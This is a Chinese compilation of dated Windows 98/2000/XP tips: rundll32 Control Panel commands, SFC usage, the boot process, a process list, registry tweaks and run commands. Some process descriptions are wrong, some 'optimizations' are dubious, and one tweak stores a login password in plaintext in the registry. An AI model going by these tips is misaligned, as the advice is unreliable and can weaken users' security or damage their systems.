     这里要注意三点：1.Dll档案名中不能含有空格，比如该档案位於c:\ProgramFiles\目录，你要把这个路径改成c:\Progra～1\；2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯！3.这是最重要的一点：Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的GetUserName(),GetTextFace()等。在Visual Basic中，提供了一条执行外部程式的指令Shell,格式为：
     Shell “命令列”
     如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难以甚至无法实现的效果：仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程式中呼叫。而现在只需一句:

     Shell “rundll32.exe user.exe,restartwindows”就搞定了！是不是方便多了？
     实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面，我就将本人在因特网上收集的有关Rundll的指令列举如下（很有用的，能省去你很多呼叫Windows　API的时间！！），供大家在程式设计中引用：
     命令列: rundll32.exe shell32.dll,Control_RunDLL
     功能: 显示控制面板
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
     功能: 显示“控制面板－辅助选项－键盘”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
     功能: 显示“控制面板－辅助选项－声音”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
     功能: 显示“控制面板－辅助选项－显示”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
     功能: 显示“控制面板－辅助选项－滑鼠”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
     功能: 显示“控制面板－辅助选项－传统”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
     功能: 执行“控制面板－添加新硬体”向导。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
     功能: 执行“控制面板－添加新印表机”向导。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
     功能: 显示 “控制面板－添加/删除程式－安装/卸载” 面板。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
     功能: 显示 “控制面板－添加/删除程式－安装Windows” 面板。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
     功能: 显示 “控制面板－添加/删除程式－启动盘” 面板。
     命令列: rundll32.exe syncui.dll,Briefcase_Create
     功能: 在桌面上建立一个新的“我的公文包”。
     命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
     功能: 显示复制软碟视窗
     命令列: rundll32.exe apwiz.cpl,NewLinkHere ％1
     功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由％1参数决定。
     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
     功能: 显示“日期与时间”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
     功能: 显示“时区”选项视窗。
     命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称]
     功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。
     命令列: rundll32.exe rnaui.dll,RnaWizard
     功能: 显示“新建拨号连接”向导的视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
     功能: 显示“显示属性－背景”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
     功能: 显示“显示属性－萤屏保护”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
     功能: 显示“显示属性－外观”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
     功能: 显示显示“显示属性－属性”选项视窗。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
     功能: 显示Windows的“字体”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
     功能: 同样是显示Windows的“字体”档案夹。
     命令列: rundll32.exe shell32.dll,SHformatDrive
     功能: 显示格式化软碟对话框。
     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
     功能: 显示“控制面板－游戏控制器－一般”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
     功能: 显示“控制面板－游戏控制器－进阶”选项视窗。
     命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档)
     功能: 列印HTML文档。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
     功能: 显示Microsoft Exchange一般选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
     功能: 显示“控制面板－滑鼠” 选项 。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
     功能: 显示 “控制面板－键盘属性－速度”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
     功能: 显示 “控制面板－键盘属性－语言”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
     功能: 显示Windows“印表机”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
     功能: 显示Windows“字体”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
     功能: 显示“控制面板－输入法属性－输入法”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
     功能: 执行“添加新调制解调器”向导。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
     功能: 显示“控制面板－多媒体属性－音频”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
     功能: 显示“控制面板－多媒体属性－视频”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
     功能: 显示“控制面板－多媒体属性－MIDI”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
     功能: 显示“控制面板－多媒体属性－CD音乐”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
     功能: 显示“控制面板－多媒体属性－设备”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
     功能: 显示“控制面板－声音”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
     功能: 显示“控制面板－网路”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
     功能: 显示ODBC32资料管理选项视窗。
     命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename}

     功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。
     命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
     功能: 显示“控制面板－密码”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
     功能: 显示“控制面板－电源管理属性”选项视窗。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL　PrintersFolder
     功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL　main.cpl @2)
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
     功能: 显示“控制面板－区域设置属性－区域设置”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
     功能: 显示“控制面板－区域设置属性－数字”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
     功能: 显示“控制面板－区域设置属性－货币”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
     功能: 显示“控制面板－区域设置属性－时间”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
     功能: 显示“控制面板－区域设置属性－日期”选项视窗。
     命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]
     功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
     功能: 显示“控制面板－系统属性－传统”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
     功能: 显示“控制面板－系统属性－设备管理器”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
     功能: 显示“控制面板－系统属性－硬体配置档案”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
     功能: 显示“控制面板－系统属性－性能”属性视窗。
     命令列: rundll32.exe user.exe,restartwindows
     功能: 强行关闭所有程式并重启机器。
     命令列: rundll32.exe user.exe,exitwindows
     功能: 强行关闭所有程式并关机。
     命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
     功能: 显示“拨号属性”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
     功能: 显示“桌面主旨”选项面板
     当然，不止是VisualBasic，象Delphi.VisualC＋＋等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具体方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果！

SFC使用方法

    SFC(System Files Checker，系统文件检查器)。以管理员身份登录Windows XP，将Windows XP的安装光盘放入光驱，在“命令提示符”窗口中键入“SFC/SCANNOW”命令后回车，“系统文件检查器”开始自动扫描系统文件，而且不需要你的任何干预。不过需要提醒大家的是，尽管Windows 2000/XP下的“SFC”比Windows 98下的“SFC”聪明得多，但要想正常运行它，还得注意以下两个问题：

    1.在运行“SFC”之前必须将Windows XP安装光盘放入光驱，否则在扫描过程中会提示你插入安装光盘。即使你插入了安装光盘，系统仍会有出错提示。
    2.在Windows 2000/XP下使用“系统文件检查器”时，必须加上正确的参数才能正常运行。我们可以在“命令提示符”窗口中键入“SFC”命令查看这些参数。
    3.由于Windows 2000/XP下的“SFC”命令是完全自动执行的，因此我们无法直接知道修复了哪些系统文件。不过我们可以通过以下方法间接获得系统文件的修复情况：依次打开“控制面板→管理工具→事件查看器→系统”，根据时间提示，从列表中选定运行“SFC”时的事件，右击该事件并查看其属性即可。

Windows2000/XP启动过程详解

Windows2000/XP是一个优秀的操作系统,它功能强大,安全稳定,深受广大电脑用户青睐。但在使用过程中,我们明显地感觉到它的启动时间比Windows98要延长许多,比之Windows98更能考验人的耐性。那么在这段让人忍无可忍但又不可不忍的时间中,系统究竟做了些什么工作哪,别急，，容俺慢慢道来，咱看一看它究竟为何如此龟速。
     在基于INTEL的计算机上,Windows2000/XP的启动过程大致可分为5个步骤:预启动,启动,装载内核,初始化内核以及用户登录。下面分别展开介绍：
     一.预启动
     首先计算机通电进行自检,并由BIOS(即基本输入输出系统)完成基本硬件配置,然后读取硬盘的MBR(主引导记录)检查硬盘分区表以确定引导分区,并将引导分区上的操作系统引导扇区调入内存中执行,此处即执行NTLDR(操作系统加载器)文件。
          * Windows2000/XP支持多重启动。它在安装时会首先将已存在的其它操作系统引导扇区保存为BOOTSECT.DOS文件(位于活动分区根目录下),并修改系统引导扇区,以便系统启动时加载NTLDR文件,从而达到多重启动的目的。而Windows98则不具备这个功能，因此如果先装好Windows2000/XP后再装Windows98会破坏掉Windows2000/XP的引导记录，导致2000/XP不能启动。
     二.启动
          1.首先进行出始化,NTLDR会把处理器从实模式转换为32位保护模式。
          2.读取BOOT.INI文件。该文件位于活动分区根目录下,它的作用是使系统在启动过程中出现选择菜单,由用户选择希望启动的操作系统。如果选择启动Windows2000/XP,NTLDR会继续引导进行以下过程;如果选择为非Windows2000/XP系统,NTLDR则会读取系统引导扇区副本BOTSECT.DOS转入启动相应系统。
          * 其中[BOOT LOADER]即操作系统加载器,指定系统选择菜单默认等待时间和默认引导的操作系统。可手工修改或在控制面板中修改，为了保险起见，建议在控制面板中修改。依次选择控制面板-〉系统-〉高级->启动和故障恢复，即可更改相关设置。(在WindowsXP中还有另一种方法，即运行msconfig（系统配置实用程序）。
            [OPERATING SYSTEMS]段指定操作系统列表,由双引号括起来的部分就是列表所显示的内容,可任意修改,使其更加个性化。
          * 形如MULTI(0)DISK(0)RDISK(0)PARTITION(1)格式的语句被称为ARC路径,它的格式为:MULTI()--指定磁盘控制器(若为SCSI控制器,则此处应替换为SCSI())；DISK()--指定SCSI设备编号(对于MULTI该处值始终为0)；RDISK()--指定IDE设备编号(对于SCSI,此处被忽略)；PARTITION()--指定分区编号。除分区编号由1开始外,其余编号均从0开始。
            参数/FASTDETECT表示禁用串行鼠标检测,是系统默认值。还有几个常见参数:MAXMEM--指定Windows2000/XP可用内存容量;BASEVIDEO--使用标准VGA显示驱动程序;NOGUIBOOT--启动过程中不显示图形屏幕;SOS--加载设备驱动程序时显示其名称。
          * 在操作系统选择菜单中的中文字体由位于活动分区根目录下的BOOTFONT.BIN文件提供。
          3.系统加载NTDETECT.COM文件。由它来检测机器硬件,如并行端口,显示适配器等等,并将收集到的硬件列表返回NTLDR用于以后在注册表中注册保存。
          4.如果Windows2000/XP有多个硬件配置文件,此时会出现选择菜单,等待用户确定要使用的硬件配置文件,否则直接跳过此步,启用默认配置。
          * 硬件配置文件是指保存计算机特定硬件配置的系统文件。可以创建多个不同的硬件配置文件以满足计算机在不同场合的应用。可以依次选择控制面板-〉系统->硬件-〉硬件配置文件作出修改。
     三.装载内核
          引导过程开始装载Windows2000/XP内核NTOSKRNL.EXE。这个文件位于Windows2000/XP安装文件夹下的SYSTEM32文件夹中。随后,硬件抽象层(HAL)被引导进程加载,完成本步骤。
          * 硬件抽象层(HAL):隐藏特定平台的硬件接口细节,为操作系统提供虚拟硬件平台,使其具有硬件无关性,可在多种平台上进行移植。
     四.初始化内核
          内核完成初始化,NTLDR将控制权转交Windows2000/XP内核,后者开始装载并初始化设备驱动程序,以及启动WIN32子系统和WINDOWS2000/XP服务。
     五.用户登录
          开始登录进程。由WIN32子系统启动WINLOGON.EXE,并由它启动LOCAL SECURITY AUTHORITY(LSASS.EXE)显示登录对话框。用户登录后,WINDOWS2000/XP会继续配置网络设备和用户环境。最后,伴随着微软之声和我们熟悉的个性化桌面,WINDOWS2000/XP漫长的启动过程终于完成。呵，是不是睡着了，醒醒吧，系统启动成功，您现在该干嘛就干嘛！

Windows 2000/XP 的任务管理器是一个非常有用的工具，它能提供我们很多信息，比如现在系统中运行的程序（进程），但是面对那些文件可执行文件名我 们可能有点茫然，不知道它们是做什么的，会不会有可疑进程（病毒，木马等）。本文的目的就是提供一些常用的Windows 2000 中的进程名，并简单说明它们的用处。

在Windows 2000 中,系统包含以下缺省进程：
Csrss.exe
Explorer.exe
Internat.exe
Lsass.exe
Mstask.exe
Smss.exe
Spoolsv.exe
Svchost.exe
Services.exe
System
System Idle Process
Taskmgr.exe
Winlogon.exe
Winmgmt.exe

下面列出更多的进程和它们的简要说明

进程名描述

smss.exeSessionManager
csrss.exe 子系统服务器进程
winlogon.exe管理用户登录
services.exe包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
svchost.exe Windows 2000/XP 的文件保护系统
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe资源管理器
internat.exe托盘区的拼音图标)
mstask.exe允许程序在指定时间运行。
regsvc.exe允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exemsftpsvc,w3svc,iisadmn
tlntsvr.exe tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
termsrv.exe termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。
ups.exe 管理连接到计算机的不间断电源(UPS)。
wins.exe为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
llssrv.exe证书记录服务
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
RsSub.exe 控制用来远程储存数据的媒体。
locator.exe 管理 RPC 名称服务数据库。
lserver.exe 注册客户端许可证。
dfssvc.exe管理分布于局域网或广域网的逻辑卷。
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统或其它事务保护护资源管理器。
faxsvc.exe帮助您发送和接收传真。
cisvc.exe 索引服务
dmadmin.exe 磁盘管理请求的系统管理服务。
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
netdde.exe提供动态数据交换 (DDE) 的网络传输和安全特性。
smlogsvc.exe配置性能日志和警报。
rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。
RsEng.exe 协调用来储存不常用数据的服务和管理工具。
RsFsa.exe 管理远程储存的文件的操作。
grovel.exe扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存储点，以节省磁盘空间（只对 NTFS 文件系统有用）。
SCardSvr.ex 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
snmptrap.exe接收由本地或远程 SNMP 代理程序产生的陷阱（trap）消息，然后将消息传递到运行在这台计算机上 SNMP 管理程序。
UtilMan.exe 从一个窗口中启动和配置辅助工具。
msiexec.exe依据 .MSI 文件中包含的命令来安装、修复以及删除软件。

总结： 发现可疑进程的秘诀就是要多看任务管理器中的进程列表，看多了以后，一眼就可以发现可可疑进程，就象找一群熟悉人中的陌生人一样。

在Windows 2000使用纯DOS的方法

有一种非常巧妙的方法可以让Windows 2000安装后也能够进入纯DOS：在安装Windows 2000前先用Windows 98启动盘启动，并通过SYS C：命令向C盘传输系统，然后按常规方法安装Windows 2000，安装成功后即可在启动菜单中在默认的Microsoft Windows 2000菜单下会多出一个Microsoft Windows项目，选中此选项就会启动Windows，但由于我们并没有安装Windows 98，所以此时会出现我们需要的DOS窗口，而且绝对是正宗的实模式。

Win2000设置技巧

许多设置涉及到注册表，请小心操作，注意备份！

    对象为Windows 2000 Professional。

    内存性能优化：

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management 中设置 ClearPageFileAtShutdown=1。

    若内存≥128M，进行如下优化：

    DisablePagingExecutive键值设为1：系统正运行的文件被强制保留在内存中而非移入虚拟内存。

    LargeSystemCache键值设为1：Windows 2000使用系统缓存（同Windows 9x中Vcache），使磁盘输入/输出性能有巨大提高。

    系统性能优化：

    1. CPU二级缓存

    L2：CPU二级缓存，是CPU的一个组成部分。然而，Windows2000不对二级缓存作出检测 ，需手动设定。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\MemoryManagement\SecondLevelDataCache，值（以KB为单位）调整为所用CPU的二级缓存实际大小。

    注：可选用十六进制或十进制，填入大小值应该选十进制。

    2. 修改磁盘缓存

    Windows2000默认的I/O页面文件比较保守。对于不同的内存，采用不同的磁盘缓存是较好的做法。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit中，根据内存修改其十六进制值：

    64M→1000；

    128M→4000；

    256M→10000；

    512M或更大→40000。

    3. IRQ中断请求

    计算机的每一个主要部件都设IRQ中断号。通过修改每个IRQ请求的优先次序实现优化。这里的优化对象是系统/CMOS实时钟，通过主板来提升性能。

    1）确定需要获得更高的性能的组件。

    2）找到组件正在使用的IRQ中断号。系统属性→硬件→设备管理器→右击待查组件→属性→资源，可以看到设备正在使用的IRQ中断号。记录中断号。

    3）HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\PriorityControl中新建DWORD双字节值IRQ#Priority（#是具体中断号），值设为1。

    4）重新启动。

    建议优化系统CMOS实时钟（IRQ8），改善整块主板的性能。如要撤消优化设置，只要删除设置的注册表键值。

    4. 不加载DLL文件

    浏览器在使用之后往往会有部分DLL文件在内存中驻留一段时间，部分内存会被无用的DLL文件占用。

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer新建字符值：AlwaysUnloadDLL，值设为1。

    如要去除这项优化，将该键值设为0（或删除键值）。

    注意：该项优化在Windows重新启动后生效。

    5. 删除多余的DLL文件

    Windows2000的System和System32目录下有大量dll文件被系统或应用软件共享。经常安装卸载软件会增加dll垃圾文件，占用硬盘空间，降低系统运行速度。

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs中，存放有关软件共享的dll路径信息，每个dll文件的项值表明它已被几个应用软件共享。如果该项值为0，则说明不被任何软件共享，可以删除，然后再删除对应的dll文件。

    6. 精简注册表（慎用！）

    精简注册表的方法是重建注册表：

    1）Windows2000下用Regedit导出整个注册表（注意：要确保导出全部注册表而非一个分支），将其存为c:\x.reg。

    2）用DOS 7.0重新启动，载入磁盘高速缓存程序Smartdrv.exe以加快处理速度。

    3）运行DOS版的REGEDIT：C:\Windows\regedit/c x.reg（参数/C表示从后面指定文件中重新生成整个注册表），重建的注册表文件比减小25-30%左右，达到精简目的。

    7. 等待时间优化

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control中：

    WaitToKillServiceTimeout设为：1000或更小。

    HKEY_CURRENT_USER\Control Panel\Desktop和HKEY_USERS\Control Panel\Desktop中：

    （1）WaitToKillAppTimeout改为1000，即关闭程序时仅等待1秒；

    （2）HungAppTimeout值改为：200，表示程序出错时等待0.5秒；

    3）AutoEndTasks值改为1，表示自动关闭停止相应的程序。

    8. 快速定位鼠标

    Windows 2000允许用户对鼠标的采样速率进行设定，使鼠标能更精确地移动和定位。

    鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz。如果在设置后系统变得不稳定，改变采样速率，设置成80Hz或以下即可。

    9. 快速显示菜单

    Windows 2000的默认菜单显示是“淡入淡出”的效果，这种效果下，修改菜单的显示速度并不明显。

    将“动画显示菜单和工具提示”效果”改为“滚动效果”。

    HKEY_CURRENT_USER\ControlPanel\Desktop中MenuShowDelay项，这一项的取值范围是0～100000（单位为毫秒），将默认的值改为0或者是400。

    10. 删除多余的键盘布局、输入法和区域设置

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts中，对应“控制面板”中的“键盘布局/输入法”，可直接删除未用语言的键盘布局和未用的输入法子项；

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale中，是“区域设置”，保留值不为空的项值，其它的全部删除。

    11. 删除系统不用的字体和HELP文档（慎用！）

    把\WINNT\Fonts整个目录打包压缩成一个文件保存。删除所有不用的字体，只保留Arial、Marlett、Micosoft Scans Serif Regular 、MingLiU & PmingLiU、Modern、MS Outlook、MS Serif 8,10,12、Script、SimSun & NsimSun、Tahoma、Times New Roman、宋体、仿宋、楷体、黑体几个字体。需要其它字体时解压对应的字体到Fonts目录中。

    12. 在“运行”中添加“在单独的内存空间中运行”的选项

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer中，新建DWORD型MemCheckBoxInRunDlg，值设为1。

    注：默认情况下，所有16位程序都在单一共享的 VDM （虚拟DOS机器）进程中作为线程运行。这种情况下，这些程序共享分配给 VDM 进程的内存空间，因此不能同时运行。所作设置就是允许用户在专用的(不是共享的)VDM进程中运行16位程序。复选框只在用户在输入16位程序时才被启用。

    启动优化：

    1.取消系统检测串口

    打开 Boot.ini 文件，如下修改：

    [operating systems]

    multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows 2000 Professional" /fastdetect/NoSerialMice

    启动时不检测行串口，缩短启动时间。

    2. 快速启动

    multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /fastdetect

    改为：multi(0)disk(0)rdisk(0)partition(2)\WINNT="Microsoft Windows 2000 Professional" /nodetect

    HKey_Local_Machine\System\ControlSet001\Control中，SystemStartOptions键值改为nodetect

    3.关闭无用服务

    运行→Services.msc→Windows2000服务的详细列表。

    Windows 2000服务设置

    4. 加快启动和减少故障恢复时间

    减少Windows2000系统启动时显示操作系统列表的时间。如果不是网络系统管理员，可以去掉“将事件写入系统日志”和“发出管理警报”两个选项，并将“写入调试信息”设置为“无”。

    5. 删掉不需要的组件

    （1）去除文件夹选项的文件隐藏、只读等属性；

    （2）\WINNT\inf文件夹，用记事本打开sysoc.ini文件，替换“,hide”为空，保存退出。控制面板→添加/删除程序→添加/删除Windows组件，根据需要修改。

    6. 屏蔽CD自动播放

    启动时，打开CD自动播放功能会延缓启动速度。运行→gpedit.msc→管理模板，设置是否自动播放CD。

    7. 快速登录计算机系统

    系统属性→网络ID→网络标识→根据“网络标识向导”操作。

    设置时注意：选择“本机用于家庭，不是商业网络的一部分”，以及“Windows始终假设下列用户已登录到本机上”。

    HKEY_LOCAL_MACHINE\Software\Microsoft\WinNT\CurrentVersion\Winlogon中，

    （1）AutoAdminLogon值改为“1”

    （2）DefaultDomainName值改为所要登录的域名或本机计算机名

    （3）DefaultUserName值改为自动登录的用户名

    （4）DefaultPassword值改为密码。（注意：这几个都是字符串值。）

    如果想临时取消自动登录或者需要以其他用户名登录，在启动时按住Shift键。

    8. 加快Explorer启动速度

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace中：

    删除{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (计划任务)

    9. Windows 2000启动盘制作：

    （1）Windows 2000 启动盘：d:\bootdisk\makeboot a:

    （2）Windows 2000 引导盘：ntldr，ntdlect.com，boot.ini，IO.sys

    （3）Windows 2000 紧急修复磁盘（ERD）：ntbackup.exe

Windows常用命令集

winver－－－－－－－－－检查windows版本
wmimgmt.msc－－－－打开windows管理体系结构(wmi)
wupdmgr－－－－－－－－windows更新程序
w脚本－－－－－－－－windows脚本宿主设置
write－－－－－－－－－－写字板
winmsd－－－－－－－－－系统信息
wiaacmgr－－－－－－－扫描仪和照相机向导
winchat－－－－－－－－xp自带局域网聊天

mem.exe－－－－－－－－显示内存使用情况
msconfig-----------启动
msconfig.exe－－－系统配置实用程序
mplayer2－－－－－－－简易widnows media player
mspaint－－－－－－－－画图板
mstsc－－－－－－－－－－远程桌面连接
mplayer2－－－－－－－媒体播放机
magnify－－－－－－－－放大镜实用程序
mmc－－－－－－－－－－－－打开控制台
mobsync－－－－－－－－同步命令

dxdiag－－－－－－－－－检查directx信息
drwtsn32－－－－－－ 系统医生
devmgmt.msc－－－ 设备管理器
dfrg.msc－－－－－－－磁盘碎片整理程序
diskmgmt.msc－－－磁盘管理实用程序
dcomcnfg－－－－－－－打开系统组件服务
ddeshare－－－－－－－打开dde共享设置
dvdplay－－－－－－－－dvd播放器

nslookup－－－－－－－ip地址侦测器
net stop messenger－－－－－停止信使服务
net start messenger－－－－开始信使服务
notepad－－－－－－－－打开记事本
nslookup－－－－－－－网络管理的工具向导
ntbackup－－－－－－－系统备份和还原
narrator－－－－－－－屏幕“讲述人”
ntmsmgr.msc－－－－移动存储管理器
ntmsoprq.msc－－－移动存储管理员操作请求
netstat －an－－－－(tc)命令检查接口

syncapp－－－－－－－－创建一个公文包
sysedit－－－－－－－－系统配置编辑器
sigverif－－－－－－－文件签名验证程序
sndrec32－－－－－－－录音机
shrpubw－－－－－－－－创建共享文件夹
secpol.msc－－－－－本地安全策略
syskey－－－－－－－－－系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc－－－本地服务设置
sndvol32－－－－－－－音量控制程序
sfc.exe－－－－－－－－系统文件检查器
sfc /scannow－－－windows文件保护(扫描错误并复原)

tsshutdn－－－－－－－60秒倒计时关机命令
tourstart－－－－－－xp简介（安装完成后出现的漫游xp程序）
taskmgr－－－－－－－－任务管理器 （2000／xp／2003）

eventvwr－－－－－－－事件查看器
eudcedit－－－－－－－造字程序
explorer－－－－－－－打开资源管理器

packager－－－－－－－对象包装程序
perfmon.msc－－－－计算机性能监测程序
progman－－－－－－－－程序管理器

regedit.exe－－－－注册表
rsop.msc－－－－－－－组策略结果集
regedt32－－－－－－－注册表编辑器
rononce －p －－－－15秒关机
regsvr32 /u *.dll－－－－停止dll文件运行
regsvr32 /u zipfldr.dll－－－－－－取消zip支持

cmd.exe－－－－－－－－cmd命令提示符
chkdsk.exe－－－－－chkdsk磁盘检查
certmgr.msc－－－－证书管理实用程序
calc－－－－－－－－－－－启动计算器
charmap－－－－－－－－启动字符映射表
cliconfg－－－－－－－sql server 客户端网络实用程序
clipbrd－－－－－－－－剪贴板查看器
conf－－－－－－－－－－－启动netmeeting
compmgmt.msc－－－计算机管理
cleanmgr－－－－－－－垃圾整理
ciadv.msc－－－－－－索引服务程序

osk－－－－－－－－－－－－打开屏幕键盘
odbcad32－－－－－－－odbc数据源管理器
oobe/msoobe /a－－－－检查xp是否激活

lusrmgr.msc－－－－本机用户和组
logoff－－－－－－－－－注销命令

iexpress－－－－－－－木马捆绑工具，系统自带

fsmgmt.msc－－－－－共享文件夹管理器

utilman－－－－－－－－辅助工具管理器

gpedit.msc－－－－－组策略

巧妙安装各种Windows操作系统

对于新购置的电脑，在完成对硬盘的分区、格式化操作以后，就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。

    安装Windows 98

    新安装Windows 98系统，可以使用Windows 98系统启动盘启动计算机，然后将Windows 98安装光盘放入光驱，在DOS提示符状态下，进入光盘所在驱动器，然后进入Windows 98安装目录，运行Setup命令即可开始安装Windows 98。

    在开始安装时，安装程序会自动调用Scandisk程序对电脑系统进行检测，检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时，单击选中“接受协议”选项并单击“下一步”按钮，这时会要求你输入“产品密钥”，也就是我们常说的Windows 98安装序列号，完成后单击“下一步”按钮进行安装。

